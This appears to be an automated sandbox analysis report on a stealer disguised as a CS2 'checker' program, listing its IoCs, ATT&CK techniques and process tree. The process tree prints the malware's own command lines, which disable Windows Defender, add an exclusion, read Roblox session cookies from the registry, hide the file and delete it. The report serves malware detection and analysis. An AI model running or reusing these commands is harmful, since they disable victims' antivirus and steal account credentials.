umbral | e1eedf9077fe9a2532130dc80fcd13878835490f5eae82295805b7eb67691a82

Analysis

max time kernel
132s
max time network
119s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
03-07-2024 14:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CS2RED' Programs/CS2REDСhecker.exe
Size

229KB
MD5

8171222317c30d31448205d70bca990f
SHA1

574d07820d3cb49c60a29defe88675072b9ae977
SHA256

d7a96d169d8c99e83b7a4eb920b8934cedeaa0ce1619d0cc677a83e0556ca2c2
SHA512

3a7f30a04f843294775b2501b9f51e4f2d2af4a834fa573791dcb2556526f4b834ac019bebab3fb9f062dd3012328cc2ea75db87df32d9b23346e2c495267e80
SSDEEP

6144:lloZM+rIkd8g+EtXHkv/iD45S4Uhv0IH+2PxM4d5Zb8e1m4i:noZtL+EP85S4Uhv0IH+2PxM4dLq

Score

10^/10

umbral execution spyware stealer

Malware Config

Signatures

Detect Umbral payload 1 IoCs

resource	yara_rule
behavioral1/memory/1976-1-0x00000000000C0000-0x0000000000100000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2284	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	CS2REDСhecker.exe

Deletes itself 1 IoCs

pid	Process
2808	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
9	discord.com
10	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
6	ip-api.com

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1356	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2220	PING.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1976	CS2REDСhecker.exe
2284	powershell.exe
2616	powershell.exe
2184	powershell.exe
2520	powershell.exe
484	powershell.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1976	CS2REDСhecker.exe
Token: SeIncreaseQuotaPrivilege	3000	wmic.exe
Token: SeSecurityPrivilege	3000	wmic.exe
Token: SeTakeOwnershipPrivilege	3000	wmic.exe
Token: SeLoadDriverPrivilege	3000	wmic.exe
Token: SeSystemProfilePrivilege	3000	wmic.exe
Token: SeSystemtimePrivilege	3000	wmic.exe
Token: SeProfSingleProcessPrivilege	3000	wmic.exe
Token: SeIncBasePriorityPrivilege	3000	wmic.exe
Token: SeCreatePagefilePrivilege	3000	wmic.exe
Token: SeBackupPrivilege	3000	wmic.exe
Token: SeRestorePrivilege	3000	wmic.exe
Token: SeShutdownPrivilege	3000	wmic.exe
Token: SeDebugPrivilege	3000	wmic.exe
Token: SeSystemEnvironmentPrivilege	3000	wmic.exe
Token: SeRemoteShutdownPrivilege	3000	wmic.exe
Token: SeUndockPrivilege	3000	wmic.exe
Token: SeManageVolumePrivilege	3000	wmic.exe
Token: 33	3000	wmic.exe
Token: 34	3000	wmic.exe
Token: 35	3000	wmic.exe
Token: SeIncreaseQuotaPrivilege	3000	wmic.exe
Token: SeSecurityPrivilege	3000	wmic.exe
Token: SeTakeOwnershipPrivilege	3000	wmic.exe
Token: SeLoadDriverPrivilege	3000	wmic.exe
Token: SeSystemProfilePrivilege	3000	wmic.exe
Token: SeSystemtimePrivilege	3000	wmic.exe
Token: SeProfSingleProcessPrivilege	3000	wmic.exe
Token: SeIncBasePriorityPrivilege	3000	wmic.exe
Token: SeCreatePagefilePrivilege	3000	wmic.exe
Token: SeBackupPrivilege	3000	wmic.exe
Token: SeRestorePrivilege	3000	wmic.exe
Token: SeShutdownPrivilege	3000	wmic.exe
Token: SeDebugPrivilege	3000	wmic.exe
Token: SeSystemEnvironmentPrivilege	3000	wmic.exe
Token: SeRemoteShutdownPrivilege	3000	wmic.exe
Token: SeUndockPrivilege	3000	wmic.exe
Token: SeManageVolumePrivilege	3000	wmic.exe
Token: 33	3000	wmic.exe
Token: 34	3000	wmic.exe
Token: 35	3000	wmic.exe
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeDebugPrivilege	2616	powershell.exe
Token: SeDebugPrivilege	2184	powershell.exe
Token: SeDebugPrivilege	2520	powershell.exe
Token: SeIncreaseQuotaPrivilege	1176	wmic.exe
Token: SeSecurityPrivilege	1176	wmic.exe
Token: SeTakeOwnershipPrivilege	1176	wmic.exe
Token: SeLoadDriverPrivilege	1176	wmic.exe
Token: SeSystemProfilePrivilege	1176	wmic.exe
Token: SeSystemtimePrivilege	1176	wmic.exe
Token: SeProfSingleProcessPrivilege	1176	wmic.exe
Token: SeIncBasePriorityPrivilege	1176	wmic.exe
Token: SeCreatePagefilePrivilege	1176	wmic.exe
Token: SeBackupPrivilege	1176	wmic.exe
Token: SeRestorePrivilege	1176	wmic.exe
Token: SeShutdownPrivilege	1176	wmic.exe
Token: SeDebugPrivilege	1176	wmic.exe
Token: SeSystemEnvironmentPrivilege	1176	wmic.exe
Token: SeRemoteShutdownPrivilege	1176	wmic.exe
Token: SeUndockPrivilege	1176	wmic.exe
Token: SeManageVolumePrivilege	1176	wmic.exe
Token: 33	1176	wmic.exe
Token: 34	1176	wmic.exe

Suspicious use of FindShellTrayWindow 32 IoCs

pid	Process
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe

Suspicious use of WriteProcessMemory 39 IoCs

description	pid	Process	procid_target
PID 1976 wrote to memory of 3000	1976	CS2REDСhecker.exe	28
PID 1976 wrote to memory of 3000	1976	CS2REDСhecker.exe	28
PID 1976 wrote to memory of 3000	1976	CS2REDСhecker.exe	28
PID 1976 wrote to memory of 2696	1976	CS2REDСhecker.exe	31
PID 1976 wrote to memory of 2696	1976	CS2REDСhecker.exe	31
PID 1976 wrote to memory of 2696	1976	CS2REDСhecker.exe	31
PID 1976 wrote to memory of 2284	1976	CS2REDСhecker.exe	33
PID 1976 wrote to memory of 2284	1976	CS2REDСhecker.exe	33
PID 1976 wrote to memory of 2284	1976	CS2REDСhecker.exe	33
PID 1976 wrote to memory of 2616	1976	CS2REDСhecker.exe	35
PID 1976 wrote to memory of 2616	1976	CS2REDСhecker.exe	35
PID 1976 wrote to memory of 2616	1976	CS2REDСhecker.exe	35
PID 1976 wrote to memory of 2184	1976	CS2REDСhecker.exe	37
PID 1976 wrote to memory of 2184	1976	CS2REDСhecker.exe	37
PID 1976 wrote to memory of 2184	1976	CS2REDСhecker.exe	37
PID 1976 wrote to memory of 2520	1976	CS2REDСhecker.exe	39
PID 1976 wrote to memory of 2520	1976	CS2REDСhecker.exe	39
PID 1976 wrote to memory of 2520	1976	CS2REDСhecker.exe	39
PID 1976 wrote to memory of 1176	1976	CS2REDСhecker.exe	41
PID 1976 wrote to memory of 1176	1976	CS2REDСhecker.exe	41
PID 1976 wrote to memory of 1176	1976	CS2REDСhecker.exe	41
PID 1976 wrote to memory of 1764	1976	CS2REDСhecker.exe	43
PID 1976 wrote to memory of 1764	1976	CS2REDСhecker.exe	43
PID 1976 wrote to memory of 1764	1976	CS2REDСhecker.exe	43
PID 1976 wrote to memory of 1000	1976	CS2REDСhecker.exe	45
PID 1976 wrote to memory of 1000	1976	CS2REDСhecker.exe	45
PID 1976 wrote to memory of 1000	1976	CS2REDСhecker.exe	45
PID 1976 wrote to memory of 484	1976	CS2REDСhecker.exe	47
PID 1976 wrote to memory of 484	1976	CS2REDСhecker.exe	47
PID 1976 wrote to memory of 484	1976	CS2REDСhecker.exe	47
PID 1976 wrote to memory of 1356	1976	CS2REDСhecker.exe	49
PID 1976 wrote to memory of 1356	1976	CS2REDСhecker.exe	49
PID 1976 wrote to memory of 1356	1976	CS2REDСhecker.exe	49
PID 1976 wrote to memory of 2808	1976	CS2REDСhecker.exe	51
PID 1976 wrote to memory of 2808	1976	CS2REDСhecker.exe	51
PID 1976 wrote to memory of 2808	1976	CS2REDСhecker.exe	51
PID 2808 wrote to memory of 2220	2808	cmd.exe	53
PID 2808 wrote to memory of 2220	2808	cmd.exe	53
PID 2808 wrote to memory of 2220	2808	cmd.exe	53

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2696	attrib.exe

C:\Users\Admin\AppData\Local\Temp\CS2RED' Programs\CS2REDСhecker.exe
"C:\Users\Admin\AppData\Local\Temp\CS2RED' Programs\CS2REDСhecker.exe"
1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1976
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3000
- C:\Windows\system32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\CS2RED' Programs\CS2REDСhecker.exe"
  2⤵
  - Views/modifies file attributes
  PID:2696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CS2RED' Programs\CS2REDСhecker.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2284
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2616
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2520
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1176
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:1764
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:1000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:484
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:1356
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\CS2RED' Programs\CS2REDСhecker.exe" && pause
  2⤵
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  PID:2808
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - Runs ping.exe
    PID:2220

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1148

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
fe0b1c68b1edd8a34f4a66bee44e2514

SHA1
35593eb56bcd65caab8e2d8b01830129bb9759b6

SHA256
0a6849f4de47045cf55b7015b1b847c784f501dafba9cf1af1da8ba62767fd30

SHA512
dbc28d4b54f04aecb3b5d9b670e0870c6367acf36a55a5a44cb6a539d5dfe47fe78f064ad3b9c22d2e735bb988ae5889041a54d7a01a743215a07c93d20499d7

Download Submit
memory/484-44-0x0000000002040000-0x0000000002048000-memory.dmp

Filesize
32KB

Download
memory/1148-50-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1148-49-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1976-1-0x00000000000C0000-0x0000000000100000-memory.dmp

Filesize
256KB

Download
memory/1976-2-0x000007FEF5860000-0x000007FEF624C000-memory.dmp

Filesize
9.9MB

Download
memory/1976-0-0x000007FEF5863000-0x000007FEF5864000-memory.dmp

Filesize
4KB

Download
memory/1976-48-0x000007FEF5860000-0x000007FEF624C000-memory.dmp

Filesize
9.9MB

Download
memory/2284-7-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/2284-8-0x00000000028E0000-0x00000000028E8000-memory.dmp

Filesize
32KB

Download
memory/2616-15-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

Filesize
32KB

Download
memory/2616-14-0x000000001B810000-0x000000001BAF2000-memory.dmp

Filesize
2.9MB

Download